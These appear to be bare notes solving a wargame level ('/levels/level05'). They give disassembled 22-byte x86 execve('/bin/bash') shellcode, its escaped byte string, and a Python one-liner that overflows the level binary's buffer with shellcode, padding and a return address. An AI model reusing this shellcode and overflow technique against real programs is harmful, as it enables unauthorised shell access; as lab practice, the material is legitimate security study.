8048060:   6a 68                   push   $0x68
8048062:   68 2f 62 61 73          push   $0x7361622f
8048067:   68 2f 62 69 6e          push   $0x6e69622f
804806c:   89 e3                   mov    %esp,%ebx
804806e:   31 c9                   xor    %ecx,%ecx
8048070:   31 d2                   xor    %edx,%edx
8048072:   b0 0b                   mov    $0xb,%al
8048074:   cd 80                   int    $0x80

"\x6a\x68\x68\x2f\x62\x61\x73\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x31\xd2\xb0\x0b\xcd\x80"
len: 22


/levels/level05 `python -c "print('\x6a\x68\x68\x2f\x62\x61\x73\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x31\xd2\xb0\x0b\xcd\x80' + 'A'*118 + '\xbf\xff\xfb\xb0'[::-1])"`
